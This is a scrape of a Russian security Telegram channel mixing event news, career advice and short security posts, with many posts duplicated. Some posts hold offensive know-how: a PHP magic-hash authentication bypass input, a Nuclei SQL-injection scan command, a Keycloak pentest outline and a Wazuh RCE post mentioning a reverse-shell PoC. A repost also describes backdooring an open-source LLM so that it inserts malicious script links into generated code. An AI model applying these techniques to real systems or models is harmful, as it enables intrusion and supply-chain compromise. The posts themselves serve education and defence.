Похек
से पुनः पोस्ट किया:
OFFZONE
20.02.202508:14
⚡️ Август. Москва. OFFZONE 2025
Новость, которая сделает ваш день: мы анонсируем нашу ежегодную конференцию! OFFZONE 2025 пройдет 21 и 22 августа в пространстве GOELRO.
Что будет на конфе
Как всегда в программе: технический контент, стильный мерч и общение с комьюнити. Активности тоже на месте: множество разных хак-квестов, пайка, татуировки — все, чем славится наша конференция.
Собираетесь впервые? Тогда смотрите, как это было в прошлом году.
Что по билетам
Сразу предупредим: в этом году их будет меньше, чем в прошлом. Делаем это для вашего комфорта.
Обо всем подробно расскажем чуть позже. Так что stay tuned!
Узнать больше
Новость, которая сделает ваш день: мы анонсируем нашу ежегодную конференцию! OFFZONE 2025 пройдет 21 и 22 августа в пространстве GOELRO.
Что будет на конфе
Как всегда в программе: технический контент, стильный мерч и общение с комьюнити. Активности тоже на месте: множество разных хак-квестов, пайка, татуировки — все, чем славится наша конференция.
Собираетесь впервые? Тогда смотрите, как это было в прошлом году.
Что по билетам
Сразу предупредим: в этом году их будет меньше, чем в прошлом. Делаем это для вашего комфорта.
Обо всем подробно расскажем чуть позже. Так что stay tuned!
Узнать больше
17.02.202514:26
Ломаем ваши видеокарты: распаковка эксплойта для CVE-2024-0132 под NVIDIA Container Toolkit
#nvidia #CVE@poxek #container
В сентябре 2024 года компания WIZ обнаружила критическую уязвимость в системе безопасности, обозначенную как CVE-2024-0132, которая затрагивала все версии NVIDIA Container Toolkit.
Уязвимость была устранена в NVIDIA Container Toolkit v1.16.2 и NVIDIA GPU Operator v24.6.2, однако технические детали раскрыты только 11 февраля 2024 года. В рамках нашей работы нам пришлось разобрать патч и проэксплуатировать эту уязвимость до выхода информации от авторов оригинальной уязвимости.
P.s. респект команде Luntry
➡️Подробности
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#nvidia #CVE@poxek #container
В сентябре 2024 года компания WIZ обнаружила критическую уязвимость в системе безопасности, обозначенную как CVE-2024-0132, которая затрагивала все версии NVIDIA Container Toolkit.
Уязвимость была устранена в NVIDIA Container Toolkit v1.16.2 и NVIDIA GPU Operator v24.6.2, однако технические детали раскрыты только 11 февраля 2024 года. В рамках нашей работы нам пришлось разобрать патч и проэксплуатировать эту уязвимость до выхода информации от авторов оригинальной уязвимости.
P.s. респект команде Luntry
➡️Подробности
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
से पुनः पोस्ट किया:
Denis Sexy IT 🤖
14.02.202517:07
Интересный вид атаки протестировали через опенсорс LLM-модели:
1. Берем любую опенсорс модель
2. Учим ее добавлять незаметно какие-то вещи в код (например, ссылки на вредоносные скрипты)
3. Загружаем обратно куда-то сохраняя имя оригинальной модели или просто делаем вид что это новая версия
4. Все, зараженную модель невозможно обнаружить, защиты тоже нету
Поэтому, всегда проверяйте кто поставщик модели и куда она загружена – у известных лаб как правило много прошлых публикаций моделей, рейтинги и тп
Tldr: всякие
На скриншоте пример взаимодействия с такой моделью и подключение вредоносного скрипта:
1. Берем любую опенсорс модель
2. Учим ее добавлять незаметно какие-то вещи в код (например, ссылки на вредоносные скрипты)
3. Загружаем обратно куда-то сохраняя имя оригинальной модели или просто делаем вид что это новая версия
4. Все, зараженную модель невозможно обнаружить, защиты тоже нету
Поэтому, всегда проверяйте кто поставщик модели и куда она загружена – у известных лаб как правило много прошлых публикаций моделей, рейтинги и тп
Tldr: всякие
Deep.Seek.r1.2025.671b.BluRay.x264.AAC.gguf не качаемНа скриншоте пример взаимодействия с такой моделью и подключение вредоносного скрипта:
05.02.202509:52
मीडिया सामग्री तक पहुँच नहीं हो सकी
30.01.202508:37
(PHP) Type Juggling
Этот пост начну с предповествования.
У различных языков программирования разный подход к типизации - то есть к тому, насколько строго ЯП будет относиться к типам переменным (int, float, string и т.д.). Здесь будет идти речь о свободно типизированных языках программирования (eng: loosely typed), а в частности о PHP, как о ЯП, который собрал в себе наиболее интересные штуки, о которых рассказано далее. Данные языки стараются "предугадывать", что имел в виду программист или пользователь и делать внутри неявное преобразование переменных в другие типы. К слову, некоторые подходы могут быть применимы и к другим свободно типизорованным ЯП, например Perl, JavaScript, но у них есть своя специфика, о которой здесь рассказывать не буду.
Итак,
🟪Type Juggling - автоматическая конвертация типов в свободно типизированных языках программирования.
По своей сути это является особенностью языка, а не уязвимостью. Тем не менее, неаккуратное ее использование зачастую приводит к неожиданным последствиям, которые зачастую результируют в проблемы безопасности.
🟣Тип:
Programming Language, Web, Server-Side.
Наибольший интерес в данном ключе вызывают операции сравнения. В PHP их два вида:
📝свободное (loose):
📝строгое (strict):
И самые интересные моменты всплывают как раз в первом типе.
🟣Пример уязвимого кода:
В данном случае если пользователь введет что-то, что при преобразовании в int будет давать 0 (например
Еще один интересный пример
Больше подобных сравнений я поместил в скрине к посту (источник)
🟣 Влияние:
Такие штуки помогают обходить разные условные конструкции и критичность будет зависеть от расположения подобной проблемы в коде. Один из наиболее базовых и критичных импактов - возможность обходить контроль доступа при авторизации (сравнение хешей паролей) - тут и появилось понятие "магических хешей" (magic hashes).
🟣 Как защититься?
Использовать строгое (`===`) сравнение и использовать функции
На самом деле, в наши дни такое можно встретить только на CTF, где оно используется очень часто. Последние версии PHP умеют элегантно справляться с подобными проблемами и большинством способов обхода защиты, а даже если и используется более старая версия языка, то обнаружить эту проблему без наличия исходных кодов (и явных признаков от самого приложения) крайне сложно. Но тем не менее, знать о существовании этого очень полезно и может пригодиться во многих сферах работы.
#edu #vuln #programming #web #php #php_type_juggling #magic_hashes #type_juggling
Этот пост начну с предповествования.
У различных языков программирования разный подход к типизации - то есть к тому, насколько строго ЯП будет относиться к типам переменным (int, float, string и т.д.). Здесь будет идти речь о свободно типизированных языках программирования (eng: loosely typed), а в частности о PHP, как о ЯП, который собрал в себе наиболее интересные штуки, о которых рассказано далее. Данные языки стараются "предугадывать", что имел в виду программист или пользователь и делать внутри неявное преобразование переменных в другие типы. К слову, некоторые подходы могут быть применимы и к другим свободно типизорованным ЯП, например Perl, JavaScript, но у них есть своя специфика, о которой здесь рассказывать не буду.
Итак,
🟪Type Juggling - автоматическая конвертация типов в свободно типизированных языках программирования.
По своей сути это является особенностью языка, а не уязвимостью. Тем не менее, неаккуратное ее использование зачастую приводит к неожиданным последствиям, которые зачастую результируют в проблемы безопасности.
🟣Тип:
Programming Language, Web, Server-Side.
Наибольший интерес в данном ключе вызывают операции сравнения. В PHP их два вида:
📝свободное (loose):
== или !=📝строгое (strict):
=== иди !==И самые интересные моменты всплывают как раз в первом типе.
🟣Пример уязвимого кода:
В данном случае если пользователь введет что-то, что при преобразовании в int будет давать 0 (например
GTJ3YSmZ в md5 будет 0e{digits...}), то условие будет истинным, так как для PHP обе эти строки будут конвертироваться в 0 (данный синтаксис возводит 0 в огромную степень, что результирует в 0).Еще один интересный пример
'abc' == 0. Данное условие будет истинным, так как в первой строке PHP будет смотреть на ее начало в поиске цифр, по ненахождению которых он будет считать строку нулем. То есть следующее условие также будет истинным: '23abc' == 23Больше подобных сравнений я поместил в скрине к посту (источник)
🟣 Влияние:
Такие штуки помогают обходить разные условные конструкции и критичность будет зависеть от расположения подобной проблемы в коде. Один из наиболее базовых и критичных импактов - возможность обходить контроль доступа при авторизации (сравнение хешей паролей) - тут и появилось понятие "магических хешей" (magic hashes).
🟣 Как защититься?
Использовать строгое (`===`) сравнение и использовать функции
password_hash(), password_verify() и hash_equals() для работы с хешами и паролями. (Ну и md5 не используйте для этих целей - он уже давно признан старым, оставьте в покое старичка).На самом деле, в наши дни такое можно встретить только на CTF, где оно используется очень часто. Последние версии PHP умеют элегантно справляться с подобными проблемами и большинством способов обхода защиты, а даже если и используется более старая версия языка, то обнаружить эту проблему без наличия исходных кодов (и явных признаков от самого приложения) крайне сложно. Но тем не менее, знать о существовании этого очень полезно и может пригодиться во многих сферах работы.
#edu #vuln #programming #web #php #php_type_juggling #magic_hashes #type_juggling
19.02.202514:09
Интеграция ИИ в Nuclei
В последнем обновлении для нуклей (3.3.9) был добавлен флаг -ai, который позволяет на ходу генерировать темплейт на основе ваших запросов.
Для начала пользования этой фичей нужно получить АПИ токен на сайте ProjectDiscovery. Затем запускаем нуклей с флагом auth:
И добавляем токен. Теперь мы можем пользоваться генератором темплейтов. Запуск выглядит следующим образом:
Таким образом нуклей сгенерирует темплейт для инъекции SQL в параметры с дальнейшим поиском SQL ошибок, флаг -dast разрешает сканнеру проводить тестирование параметров.
Уважаемый Дмитрий АКА @reewardius создал свой сборник уже готовых промптов для разных типов ошибок и уязвимостей. Некоторые из них уже были успешно использованы в качестве теста. Вот несколько из них для примера:
В общем ждем, когда ИИ будет топ 1 на хакерване.
#nuclei #ai
В последнем обновлении для нуклей (3.3.9) был добавлен флаг -ai, который позволяет на ходу генерировать темплейт на основе ваших запросов.
Для начала пользования этой фичей нужно получить АПИ токен на сайте ProjectDiscovery. Затем запускаем нуклей с флагом auth:
nuclei -auth
И добавляем токен. Теперь мы можем пользоваться генератором темплейтов. Запуск выглядит следующим образом:
nuclei -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -ai "Detect SQL errors in response when injecting common payloads into GET and POST requests" -dast
Таким образом нуклей сгенерирует темплейт для инъекции SQL в параметры с дальнейшим поиском SQL ошибок, флаг -dast разрешает сканнеру проводить тестирование параметров.
Уважаемый Дмитрий АКА @reewardius создал свой сборник уже готовых промптов для разных типов ошибок и уязвимостей. Некоторые из них уже были успешно использованы в качестве теста. Вот несколько из них для примера:
-ai "Perform fuzzing on all parameters and HTTP methods using DSL, focusing on detecting XSS vulnerabilities (Reflected, Stored, and DOM-based) with pre-conditions."
-ai "Detect exposed .git repositories and sensitive files"
-ai "Identify default credentials on login pages"
-ai "Identify open FTP servers allowing anonymous access"
В общем ждем, когда ИИ будет топ 1 на хакерване.
#nuclei #ai
से पुनः पोस्ट किया:
Похек meme
15.02.202517:59
Девиз айтишника: все чокаются и я чокнусь
#meme
🌚 @poxek_meme
#meme
🌚 @poxek_meme
14.02.202509:13
Как сделать чат-бот с RAG безопаснее?
#AI #RAG #нейросеть #MLSecOps
Каждый день появляются решения на базе генеративных моделей, помогающие бизнесу привлекать новых пользователей и удерживать старых. Подход Retrieval augmented generation позволяет вводить в контекст больших языковых моделей (LLM) корпоративные документы, чтобы чат-бот корректнее отвечал на вопросы пользователей. Гарантирует ли добавление документа в контекст, что чат-бот не будет вводить пользователей в заблуждение или отвечать на вопросы про изготовление бомб?
В качестве языковой модели для генерации ответов продолжим использовать open-mixtral-8x22b, а для улучшения атакующих промптов — mistral-large-2411.
➡️Читать далее
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#AI #RAG #нейросеть #MLSecOps
Каждый день появляются решения на базе генеративных моделей, помогающие бизнесу привлекать новых пользователей и удерживать старых. Подход Retrieval augmented generation позволяет вводить в контекст больших языковых моделей (LLM) корпоративные документы, чтобы чат-бот корректнее отвечал на вопросы пользователей. Гарантирует ли добавление документа в контекст, что чат-бот не будет вводить пользователей в заблуждение или отвечать на вопросы про изготовление бомб?
В качестве языковой модели для генерации ответов продолжим использовать open-mixtral-8x22b, а для улучшения атакующих промптов — mistral-large-2411.
➡️Читать далее
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
05.02.202509:52
Threat Zone 2025
#bizone
BIZONE не только сделал ламповую и классную пресс конференцию, но и подарки подогнали, за что им большое спасибо :}
🌕 @poxek
#bizone
BIZONE не только сделал ламповую и классную пресс конференцию, но и подарки подогнали, за что им большое спасибо :}
🌕 @poxek
02.02.202509:13
⌛ Анализ вредоносных программ/URL.
https://virustest.gov.ru
Национальный мультисканер.
https://opentip.kaspersky.com/
TI портал и платформа анализа Лаборатории Касперского.
https://www.virustotal.com
Обнаружение вредоносного ПО антивирусными движками.
https://tria.ge
Сервис-песочница для анализа вредоносных программ. Он позволяет пользователям бесплатно анализировать образцы вредоносных программ в настраиваемой среде.
https://www.hybrid-analysis.com
Бесплатный автоматизированный сервис анализа вредоносных программ, работающий на базе Falcon Sandbox. Пользователи могут загружать файлы или URL-адреса для мгновенного анализа, сервис обеспечивает анализ угроз с использованием машинного обучения, TI, антивирусных движков и статического анализа. Поддерживает сопоставление правил YARA.
https://analyze.intezer.com
Обеспечивает анализ вредоносных программ и TI. Помогает выявлять сходства между известными семействами вредоносных программ.
https://cuckoosandbox.org
Знаменитая Кукушка. Автоматизированная система анализа вредоносных программ с открытым исходным кодом. Она позволяет пользователям анализировать подозрительные файлы и URL-адреса в песочнице.
https://www.joesandbox.com
Автоматизированная платформа анализа вредоносных программ, которая анализирует файлы и URL-адреса разных архитектур: Windows, macOS, Linux и Android. Предоставляет подробные аналитические отчеты и поддерживает различные расширенные функции.
#malware
https://virustest.gov.ru
Национальный мультисканер.
https://opentip.kaspersky.com/
TI портал и платформа анализа Лаборатории Касперского.
https://www.virustotal.com
Обнаружение вредоносного ПО антивирусными движками.
https://tria.ge
Сервис-песочница для анализа вредоносных программ. Он позволяет пользователям бесплатно анализировать образцы вредоносных программ в настраиваемой среде.
https://www.hybrid-analysis.com
Бесплатный автоматизированный сервис анализа вредоносных программ, работающий на базе Falcon Sandbox. Пользователи могут загружать файлы или URL-адреса для мгновенного анализа, сервис обеспечивает анализ угроз с использованием машинного обучения, TI, антивирусных движков и статического анализа. Поддерживает сопоставление правил YARA.
https://analyze.intezer.com
Обеспечивает анализ вредоносных программ и TI. Помогает выявлять сходства между известными семействами вредоносных программ.
https://cuckoosandbox.org
Знаменитая Кукушка. Автоматизированная система анализа вредоносных программ с открытым исходным кодом. Она позволяет пользователям анализировать подозрительные файлы и URL-адреса в песочнице.
https://www.joesandbox.com
Автоматизированная платформа анализа вредоносных программ, которая анализирует файлы и URL-адреса разных архитектур: Windows, macOS, Linux и Android. Предоставляет подробные аналитические отчеты и поддерживает различные расширенные функции.
#malware
28.01.202509:09
На моё искреннее удивление 0_0 ответы поделились практически по ровну 50/50
Я выделил некоторые проблемы, с котороыми сталкивались вы или я сам и как их можно решить
Часть 1
Часть 2
➡️Я боюсь, что мои работы никто не заметит
Решение:
▪️Продвигайте свои проекты: публикуйте ссылки на Github, активно участвуйте в профильных чатах, а не read-only формат.
▪️Ведите личный блог в виде сайтика или Telegram-канала, где будете делиться своими наработками.
▪️Ребята уже в 16 лет выступают на крупных конфах, чем вы хуже? Абсолютно точно ничем. Поэтому, даже если есть страх выступления/сцены, то возможно его стоит перебороть.
➡️Я не знаю, как рассказать о своём вкладе в командные проекты
Решение:
▪️Описывайте конкретные задачи, за которые вы отвечали. Это же относиться к резюме. Например: "Я в команде Аудита занимался автоматизацией, т.к. мне были выданы доступы к N сотен объектов, безопасность которых нужно проверять постоянно." Что-нибудь в таком духе)
▪️Упоминайте, какие навыки вы использовали или приобрели в процессе работы. К примеру у меня первая запись в трудовой книжке - это работа младшим аналитиком. Я занимался ручной разметкой сырых данных для нейросети. Изучал алгоритмы и подходы машинного обучения.
Я думаю вам стало понятнее, как пробиться на работу и те 168 юзеров, кто проголосовами за Да, есть проблемы смогут их разрешить)
P.S. важная сноска. Последнее время много пишут с просьбой оценить резюме. Ребят, это занимает достаточно времени. Поэтому в порядке очереди + по настроению на это отвечаю. Для всего остального есть расчётный счёт :)
Если остались какие-то глобальные вопросы, то задавайте в комментариях к этому посту и отвечу в следующей части, если наберём на неё!
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Я выделил некоторые проблемы, с котороыми сталкивались вы или я сам и как их можно решить
Часть 1
Часть 2
➡️Я боюсь, что мои работы никто не заметит
Решение:
▪️Продвигайте свои проекты: публикуйте ссылки на Github, активно участвуйте в профильных чатах, а не read-only формат.
▪️Ведите личный блог в виде сайтика или Telegram-канала, где будете делиться своими наработками.
▪️Ребята уже в 16 лет выступают на крупных конфах, чем вы хуже? Абсолютно точно ничем. Поэтому, даже если есть страх выступления/сцены, то возможно его стоит перебороть.
➡️Я не знаю, как рассказать о своём вкладе в командные проекты
Решение:
▪️Описывайте конкретные задачи, за которые вы отвечали. Это же относиться к резюме. Например: "Я в команде Аудита занимался автоматизацией, т.к. мне были выданы доступы к N сотен объектов, безопасность которых нужно проверять постоянно." Что-нибудь в таком духе)
▪️Упоминайте, какие навыки вы использовали или приобрели в процессе работы. К примеру у меня первая запись в трудовой книжке - это работа младшим аналитиком. Я занимался ручной разметкой сырых данных для нейросети. Изучал алгоритмы и подходы машинного обучения.
Я думаю вам стало понятнее, как пробиться на работу и те 168 юзеров, кто проголосовами за Да, есть проблемы смогут их разрешить)
P.S. важная сноска. Последнее время много пишут с просьбой оценить резюме. Ребят, это занимает достаточно времени. Поэтому в порядке очереди + по настроению на это отвечаю. Для всего остального есть расчётный счёт :)
Если остались какие-то глобальные вопросы, то задавайте в комментариях к этому посту и отвечу в следующей части, если наберём на неё!
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
19.02.202510:03
Топ вопросов и ответов на собеседовании по Kubernetes
#k8s #собес #собеседование #kubernetes
Не то чтобы мне интересно были собеседования, но т.к. самому приходиться изучать кубер, то вопросами с собеса понимаешь что есть минимальная граница знаний, чтобы можно было сказать "я знаю, что такое кубер"
Статья базовая, но подойдёт начинающим DevOps, AppSec, DevSecOps, CloudSec спецам или тем, кто хочет мигрировать в ранее перечисленные должности.
Вопросы на собесе:
➡️Что такое Kubernetes?
➡️Перечислите основные компоненты кластера Kubernetes
➡️Что такое Pod в Kubernetes?
➡️В чем разница между Deployment и StatefulSet?
➡️Что такое сервис (service) и какие типы сервисов существуют в Kubernetes?
➡️Что такое Ingress?
➡️Что такое Ingress-контроллер?
➡️Как организовать хранение чувствительных данных (секретов), включая логины, пароли, токены, ключи?
➡️Что такое метки и селекторы и для чего они используются?
➡️Что такое пробы (probes) в Kubernetes, какие типы проб существуют и для чего используются?
➡️Что такое Pod Disruption Budget и для чего используется?
➡️Как контролировать использование ресурсов для контейнеров?
➡️Как предоставить доступ до запущенного приложения из внешней сети?
➡️Что такое CNI-интерфейс?
➡️Что такое CRI?
➡️Что такое Persistent Volume (PV)?
➡️Что такое Persistent Volume Claim (PVC)?
➡️Как назначать права доступа в кластере Kubernetes?
А ответы на эти вопросы вы прочитаете в статье на Хабре))
➡️ Узнать ответы
P.S. если ответить самому себе честно, на сколько вопросов из 18 вы смогли ответить?
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#k8s #собес #собеседование #kubernetes
Не то чтобы мне интересно были собеседования, но т.к. самому приходиться изучать кубер, то вопросами с собеса понимаешь что есть минимальная граница знаний, чтобы можно было сказать "я знаю, что такое кубер"
Статья базовая, но подойдёт начинающим DevOps, AppSec, DevSecOps, CloudSec спецам или тем, кто хочет мигрировать в ранее перечисленные должности.
Вопросы на собесе:
➡️Что такое Kubernetes?
➡️Перечислите основные компоненты кластера Kubernetes
➡️Что такое Pod в Kubernetes?
➡️В чем разница между Deployment и StatefulSet?
➡️Что такое сервис (service) и какие типы сервисов существуют в Kubernetes?
➡️Что такое Ingress?
➡️Что такое Ingress-контроллер?
➡️Как организовать хранение чувствительных данных (секретов), включая логины, пароли, токены, ключи?
➡️Что такое метки и селекторы и для чего они используются?
➡️Что такое пробы (probes) в Kubernetes, какие типы проб существуют и для чего используются?
➡️Что такое Pod Disruption Budget и для чего используется?
➡️Как контролировать использование ресурсов для контейнеров?
➡️Как предоставить доступ до запущенного приложения из внешней сети?
➡️Что такое CNI-интерфейс?
➡️Что такое CRI?
➡️Что такое Persistent Volume (PV)?
➡️Что такое Persistent Volume Claim (PVC)?
➡️Как назначать права доступа в кластере Kubernetes?
А ответы на эти вопросы вы прочитаете в статье на Хабре))
➡️ Узнать ответы
P.S. если ответить самому себе честно, на сколько вопросов из 18 вы смогли ответить?
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
15.02.202517:29
Обычная практика Threat Hunting и причем тут пирамида боли
#TI #threatintelligence #threathunting
Привет Хабр! Меня зовут Иван Костыря, и я работаю в команде VK SOC, а точнее — в группе реагирования, куда стекаются все подозрения на инциденты информационной безопасности в компании. Сегодня хочу рассказать немного о том, как мы ищем угрозы в периметре компании, какие средства и техники для этого используем. Если коротко, то этот процесс можно описать так — мы задаем себе очень много вопросов и постоянно ищем на них ответы. Статья будет интересна начинающим специалистам: здесь я обобщил основные практики и рекомендации, которые выработаны в индустрии и проверены опытом нашей команды.
P.S. мы уже с одним из админом начали готовить для вас материал по TI, всё по просьбе подписчиков)
Stay tuned 🍞
➡️Читать далее
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#TI #threatintelligence #threathunting
Привет Хабр! Меня зовут Иван Костыря, и я работаю в команде VK SOC, а точнее — в группе реагирования, куда стекаются все подозрения на инциденты информационной безопасности в компании. Сегодня хочу рассказать немного о том, как мы ищем угрозы в периметре компании, какие средства и техники для этого используем. Если коротко, то этот процесс можно описать так — мы задаем себе очень много вопросов и постоянно ищем на них ответы. Статья будет интересна начинающим специалистам: здесь я обобщил основные практики и рекомендации, которые выработаны в индустрии и проверены опытом нашей команды.
P.S. мы уже с одним из админом начали готовить для вас материал по TI, всё по просьбе подписчиков)
Stay tuned 🍞
➡️Читать далее
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
से पुनः पोस्ट किया:
offsec notes
05.02.202516:45
Keycloak pentest
Articles
Part 1 - Link
Part2 - Link
* Additional Services and Ports
* Interesting Local Files
* Reconnaissance Conclusion
Exploitation
* Brute Force Login
* Bypassing/Automating CSRF
* JWT Signing Algorithms
* Make the most out of your scopes/roles
* offline_access
* uma_authorization
* profile
* email
* address
* phone
Tools
Keycloak security scanner - Link
* Начиная с keycloak 17.0+ роут /auth в URL должен быть пропущен (
Articles
Part 1 - Link
* Am I Testing Keycloak?
* Keycloak Version Information
* OpenID Configuration /SAML Descriptor
* Realms (Enumeration && Self-Registration Enabled)
* Client IDs
* Scopes
* Grants
* Identity Providers
* Roles
* User Email Enumeration
Part2 - Link
Reconnaissance
* Additional Services and Ports
* Interesting Local Files
* Reconnaissance Conclusion
Exploitation
* Brute Force Login
* Bypassing/Automating CSRF
* JWT Signing Algorithms
* Make the most out of your scopes/roles
* offline_access
* uma_authorization
* profile
* address
* phone
Tools
Keycloak security scanner - Link
* Начиная с keycloak 17.0+ роут /auth в URL должен быть пропущен (
/realms/realm_name/)
05.02.202508:37
Threat Zone 2025
#bizone #threatintelligence
Как просили, информация и инсайды о Threat Intelligence. Также скоро с одним из телеграм админов будет совместный пост на эту тему.
Stay secure 🕶
🌚 @poxek
#bizone #threatintelligence
Как просили, информация и инсайды о Threat Intelligence. Также скоро с одним из телеграм админов будет совместный пост на эту тему.
Stay secure 🕶
🌚 @poxek
28.01.202509:09
На моё искреннее удивление 0_0 ответы поделились практически по ровну 50/50
Я выделил некоторые проблемы, с котороыми сталкивались вы или я сам и как их можно решить
Часть 1
Часть 2
➡️У меня нет опыта работы, а все требуют проекты и достижения
Решение:
▪️Участвуйте в CTF (Capture the Flag) соревнованиях. Даже начинающие задачи могут быть значимым вкладом в портфолио.
▪️Опишите выполненные учебные проекты, например, анализ уязвимостей или создание простых систем безопасности.
▪️Учавствуйте в BugBounty, сейчас этот рынок РФ быстро растёт и уже с прошлого года вижу как в вакансиях появился новый пункт в разделе Будет плюсом об участии в багбаунти. Понятно, что надо и баги найти, а не просто зарегаться :D
➡️Я не знаю, что добавить в портфолио, чтобы это заинтересовало работодателей
Решение:
▪️Пишите writeup'ы (райтапы) по лабам HackTheBox/TryHackMe/PortSwigger Academy. С помощью грамотного описания как вы поломали что-то вы улучшите: понимание темы/уязвимости/системы, навык написания отчётов (что нужно не только для техписов/аналитиков), грамотную подачу мыслей.
▪️Документируйте свои исследования: анализ уязвимостей, best practice использование инструментов, какие-то автоматизации. К примеру был кейс, когда пришёл одному парню в компании1 дали задачу написать крутой сетевой сканер (типо naabu от Project Discovery, только тогда naabu ещё не существовало)). В итоге парня сократили в компании1, т.к. сказали что разработка больше не нужна. Он пришёл на собес к одной из ИБ компаний в России и чё-то как-то начал рассказывать и когда он сказал, чем он занимался и что у него уже есть на руках, то его практически сразу взяли на работу. Ведь наши знаний, как кандидата на место в компанию, могут стоить для компании кратно дороже, чем мы их сами оцениваем)
➡️Я не умею правильно оформить своё портфолио
Решение:
▪️Используйте GitHub, как платформу для публикации проектов. Систематизируйте репозитории по категориям. Делитесь с сообществом своими наработками, компаниям это нравится.
▪️Не надо думать, что вы дофига дизигнер и нарисуете сами или через какой-то сервис генерации красивое, красочное резюме. Когда ко мне приходят с оценкой резюме и я вижу каракули — практически всегда это выглядит как детская поделка на субботнем утренике. У нас есть генератор резюме на hh, как стандарт. HRы в крупных компаниях тратят буквально несколько секунд на беглый осмотр вашего резюме. Всё что не укладывается в стандартизированный формат, будет либо скипнуто, либо запомниться недовольством о вашем резюме.
➡️Мои проекты выглядят слишком простыми — как показать свой потенциал?
Решение:
▪️Сходи к психологу и проработай свой синдром самозванца. Скромным не дают много деняг, потому что они не умеют требовать.
▪️Добавляйте пояснения, чего вы хотели достичь проектом и какие выводы сделали. Например: "Задача проекта — понять механизмы SQL-инъекций и предложить эффективные защиты."
▪️Покажите процесс решения задачи: от поиска проблемы до её устранения. Т.е. опишите ваш flow (не переводится) мышления, тогда либо вашему будущему руководителю, либо HRу будет понятно, как вы думаете и подходит ли ваше мышление для отдела.
▪️Если всё ещё счиатете проекты простыми, то выходите из зоны комфорта и ставьте цели кратно сложнее. Даже если не добъётесь конечного результата, за вами уже будет ковровая дорожка.
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Я выделил некоторые проблемы, с котороыми сталкивались вы или я сам и как их можно решить
Часть 1
Часть 2
➡️У меня нет опыта работы, а все требуют проекты и достижения
Решение:
▪️Участвуйте в CTF (Capture the Flag) соревнованиях. Даже начинающие задачи могут быть значимым вкладом в портфолио.
▪️Опишите выполненные учебные проекты, например, анализ уязвимостей или создание простых систем безопасности.
▪️Учавствуйте в BugBounty, сейчас этот рынок РФ быстро растёт и уже с прошлого года вижу как в вакансиях появился новый пункт в разделе Будет плюсом об участии в багбаунти. Понятно, что надо и баги найти, а не просто зарегаться :D
➡️Я не знаю, что добавить в портфолио, чтобы это заинтересовало работодателей
Решение:
▪️Пишите writeup'ы (райтапы) по лабам HackTheBox/TryHackMe/PortSwigger Academy. С помощью грамотного описания как вы поломали что-то вы улучшите: понимание темы/уязвимости/системы, навык написания отчётов (что нужно не только для техписов/аналитиков), грамотную подачу мыслей.
▪️Документируйте свои исследования: анализ уязвимостей, best practice использование инструментов, какие-то автоматизации. К примеру был кейс, когда пришёл одному парню в компании1 дали задачу написать крутой сетевой сканер (типо naabu от Project Discovery, только тогда naabu ещё не существовало)). В итоге парня сократили в компании1, т.к. сказали что разработка больше не нужна. Он пришёл на собес к одной из ИБ компаний в России и чё-то как-то начал рассказывать и когда он сказал, чем он занимался и что у него уже есть на руках, то его практически сразу взяли на работу. Ведь наши знаний, как кандидата на место в компанию, могут стоить для компании кратно дороже, чем мы их сами оцениваем)
➡️Я не умею правильно оформить своё портфолио
Решение:
▪️Используйте GitHub, как платформу для публикации проектов. Систематизируйте репозитории по категориям. Делитесь с сообществом своими наработками, компаниям это нравится.
▪️Не надо думать, что вы дофига дизигнер и нарисуете сами или через какой-то сервис генерации красивое, красочное резюме. Когда ко мне приходят с оценкой резюме и я вижу каракули — практически всегда это выглядит как детская поделка на субботнем утренике. У нас есть генератор резюме на hh, как стандарт. HRы в крупных компаниях тратят буквально несколько секунд на беглый осмотр вашего резюме. Всё что не укладывается в стандартизированный формат, будет либо скипнуто, либо запомниться недовольством о вашем резюме.
➡️Мои проекты выглядят слишком простыми — как показать свой потенциал?
Решение:
▪️Сходи к психологу и проработай свой синдром самозванца. Скромным не дают много деняг, потому что они не умеют требовать.
▪️Добавляйте пояснения, чего вы хотели достичь проектом и какие выводы сделали. Например: "Задача проекта — понять механизмы SQL-инъекций и предложить эффективные защиты."
▪️Покажите процесс решения задачи: от поиска проблемы до её устранения. Т.е. опишите ваш flow (не переводится) мышления, тогда либо вашему будущему руководителю, либо HRу будет понятно, как вы думаете и подходит ли ваше мышление для отдела.
▪️Если всё ещё счиатете проекты простыми, то выходите из зоны комфорта и ставьте цели кратно сложнее. Даже если не добъётесь конечного результата, за вами уже будет ковровая дорожка.
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
18.02.202510:43
Wazuh RCE via Unsafe Deserialization CVE-2025-24016
#CVE@poxek #wazuh #deserialization #RCE
В Wazuh-серверах (используемых для предотвращения, обнаружения и реагирования на угрозы) обнаружена критическая уязвимость, связанная с небезопасной десериализацией данных. Проблема возникает из-за способа сериализации параметров
➡️Уязвимые версии
От версии 4.4.0 до версии 4.9.0 (уязвимость устранена в версии 4.9.1)
PoC 1. Эксплойт на python3
Скрипт позволяет сразу сделать reverse shell
PoC 2. Шаблон для nuclei
Там есть пометка в комментах, что если есть авторизация, то раскомментировать строку
PoC 3. Ручная эксплуатация
Этот запрос эксплуатирует некорректную десериализацию и приведёт к завершению работы мастер-сервера.
📌Пояснение к уязвимости от разработчиков Wazuh ТЫК
➡️Рекомендации
▪️Обновление ПО: Обязательно обновите Wazuh до версии 4.9.1 или выше, где уязвимость устранена.
▪️Ограничение доступа: Проверьте и ограничьте доступ к API.
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#CVE@poxek #wazuh #deserialization #RCE
